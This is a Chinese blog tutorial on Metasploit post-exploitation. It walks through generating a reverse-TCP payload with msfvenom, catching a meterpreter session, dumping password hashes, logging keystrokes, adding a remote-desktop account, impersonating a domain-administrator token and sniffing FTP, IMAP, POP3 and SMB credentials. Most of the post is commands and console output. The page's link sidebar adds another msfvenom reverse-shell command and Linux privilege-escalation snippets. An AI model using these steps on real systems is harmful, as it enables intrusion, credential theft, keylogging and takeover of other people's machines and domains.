反弹shell提权linux,【我i原创】Metasploit反弹shell + 嗅探 + 域提权

最新推荐文章于 2024-05-20 08:33:57 发布
最新推荐文章于 2024-05-20 08:33:57 发布
阅读量280 收藏
点赞数
文章标签: 反弹shell提权linux

[size=13.3333px]sessions -i 1 //打开建立的第一个会话

getuid //查看UID

sysinfo //查看攻击主机的系统信息

run hashdump //dump目标主机的hash帐号信息,备份进行暴破

ps //查看目标主机进程

migrate 1576(pid) //切换自己为管理员,1576是管理员的进程ID

getuid

keyscan_start //开启健盘记录功能

keyscan_dump //查看健盘记录信息

keyscan_stop //停止健盘记录

run getgui -e //远程开启目标主机的远程桌面

run getgui -u cisco -p cisco //远程添加目标主机帐号密码

rdesktop 192.168.1.100 //远程桌面

实战:

metasploit ip是 192.168.1.3

➜ ~ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f exe >b.exe

No platform was selected, choosing Msf::Module:

9baf2b6185ba2463f18727a712af6ad1.giflatform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes➜ ~ lsDesktop Documents Downloads Library Movies Music Pictures Public VirtualBox VMs b.exe

➜ ~

sf > use exploit/multi/handler

msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name  Current Setting  Required  Description

----  ---------------  --------  -----------

Exploit target:

Id  Name

--  ----

0   Wildcard Target

msf exploit(handler) > run

Started reverse TCP handler on 192.168.1.3:4444 Starting the payload handler...Sending stage (957487 bytes) to 192.168.1.11

Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.11:1027) at 2016-01-20 02:24:05 +0800

获取cmd命令直接输入shell

meterpreter > shell

Process 1600 created.

Channel 1 created.

Microsoft Windows [?汾 5.2.3790]

(C) ?? 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\>

域控提权:

meterpreter > use incognito

Loading extension incognito...success.

use incognito 调用模块命令 成功之后

list_tokens -u  查看域管理

meterpreter > list_tokens -u

[-] Warning: Not currently running as SYSTEM, not all tokens will be available

Call rev2self if primary process token is SYSTEM

Delegation Tokens Available

========================================

XINDONG-58E843E\Administrator

Impersonation Tokens Available

========================================

No tokens available

impersonate_token 你的域管理 比如:impersonate_token XINDONG-58E843E\Administrator

然后shell

就可以获取域管理权限了

以前是说明方法 由于没搭建域控 如果有域控的话 就可以通过以上方法

嗅探:

先exit退出shell

meterpreter > exit Shutting down Meterpreter...

192.168.1.11 - Meterpreter session 1 closed.  Reason: User exit

退出后选择嗅探模块

然后run

msf exploit(handler) > use auxiliary/sniffer/psnuffle

msf auxiliary(psnuffle) > run Auxiliary module execution completed

msf auxiliary(psnuffle) > Loaded protocol FTP from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/ftp.rb... Loaded protocol IMAP from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/imap.rb... Loaded protocol POP3 from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/pop3.rb... Loaded protocol SMB from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/smb.rb... Loaded protocol URL from /opt/metasploit-framework/embedded/framework/data/exploits/psnuffle/url.rb... Sniffing traffic.....

N0u6ht
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权学习之旅——利用Metasploit提权
Lemon's blog
08-16 686
1
Linux提权不能反弹Shell时利用metasploit进行提权.txt
03-18
Linux提权不能反弹Shell时利用metasploit进行提权.txt
端口号对应渗透+linux简单提权方法
2301_79028313的博客
04-16 738
通常情况下,用户在系统中拥有的权限是有限的,以保护系统的安全性和防止滥用。通过收集目标系统的信息,攻击者能够了解系统的漏洞,端口对应的渗透与系统的提权是网络渗透是重中之重。
使用MSF进行提权(windows提权linux提权、wesng使用
dzqxwzoe的博客
05-20 920
​MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
目标 linux 服务器提权,史上最全Linux提权后获取敏感信息方法 (zhuan)
weixin_29220405的博客
05-01 383
(Linux)的提权是怎么一回事:收集 – 枚举,枚举和一些更多的枚举。过程 – 通过数据排序,分析和确定优先次序。搜索 – 知道搜索什么和在哪里可以找到漏洞代码。适应 – 自定义的漏洞,所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。尝试 – 做好准备,试验和错误。系统类型系统是什么版本?cat /etc/issuecat /etc主机上有哪些工作计划?crontab -lls -al...
提权与内网渗透
VictorZhang
08-25 3895
权限在不同的应用中有不同的分类,安全相关的大致分为以下几种 1.匿名访问权限 2.来宾权限 3.用户权限 4.管理员权限 5.系统权限 电脑常见的的权限分为用户权限和管理员权限 例如普通用户权限会有很多限制,例如无法执行某些程序以及服务 Window基础命令 query user # 查看用户登录情况 whoami # 查看当前用户权限 systeminfo # 查看当前系统版本与补丁信...
Linux提权获取敏感信息方法
不好好做安全的运维足球狗
08-03 426
在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节. 文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。 ...
mysql(linux)远程数据库提权漏洞_Linux提权后获取敏感信息的方法与途径
weixin_29332867的博客
02-07 462
下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节.文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。列举关键点(Linux)的提权是怎么一回事:收集 – 枚举,枚举和一些更多的枚举。过程 – 通过数据排序,分析和确定优先...
linux80瑞口提权口今,史上最全Linux提权后获取敏感信息方法
weixin_39923599的博客
05-25 134
在本文开始之前,我想指出我不是专家。据我所知,在这个庞大的区,没有一个“神奇”的答案.分享,共享(我的出发点)。下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物。我知道有更多的“东西”去寻找。这只是一个基本粗略的指南。并不是每一个命令,做好要注重细节.文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令。列举关...
云服务器msf跨反弹shell
iuyoo的博客
03-29 5978
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
Linux 提权信息收集枚举
z4yn:)的博客
06-28 431
Linux 提权信息收集枚举 操作系统 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗? cat /proc/version uname -a uname -mrs rpm -q kernel dmesg | grep Linux ls /boot | gre
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
metasploit linux 提权.md
09-06
metasploit linux 提权.md
kechengsheji2021.zip
07-30
kechengsheji2021.zip
1cfa8b474c28bb76433ab12fc99ee5ad.jpeg
最新发布
07-30
1cfa8b474c28bb76433ab12fc99ee5ad.jpeg
TwineCompile571GetItSetup.7z
07-30
JomiTech TwineCompile 是一款集成在 C++Builder IDE 中的插件,旨在通过多种技术显著减少 C++ 编译、构建和生成的时间。以下是 TwineCompile 的一些关键能力和特点: 集成编译优化:TwineCompile 通过多线程、文件缓存和自动后台编译等技术,直接集成到 C++Builder IDE 中,优化编译过程。 编译器封装:它不是 C++ 编译器,而是将 Embarcadero 经典和 CLANG 编译器封装在一个构建系统中,优化文件和项目的构建方式。 IDE 支持:TwineCompile 通过 GetIt 包管理器提供,支持安装它的 IDE。对于旧版 IDE 或没有活跃更新订阅的 IDE,可以购买许可证以获得支持。 版本兼容性:TwineCompile 5.x 支持 C++Builder 10.2 至 C++Builder 12.0,而 TwineCompile 4.x 支持 C++Builder 5 至 C++Builder 10.1。
SCI一区】淘金算法GRO-CNN-BiLSTM-Mutilhead-Attention多变量时序预测含源码 5642.zip
07-30
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main .m; 数据; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法-CNN-BiLSTM-Mutilhead-Attention回归预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.2 粒子群算法PSO/蛙跳算法SFLA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.3 灰狼算法GWO/狼群算法WPA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.4 鲸鱼算法WOA/麻雀算法SSA-CNN-BiLSTM-Mutilhead-Attention回归预测 4.4.5 萤火虫算法FA/差分算法DE-CNN-BiLSTM-Mutilhead-Attention回归预测
metasploit 反弹shell
10-16
反弹 shellMetasploit 中的一个常用功能,可以通过它在目标机器上执行命令或者获取目标机器的控制权。具体操作步骤如下: 1. 打开 Metasploit 控制台,输入以下命令: ``` use exploit/multi/handler set ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值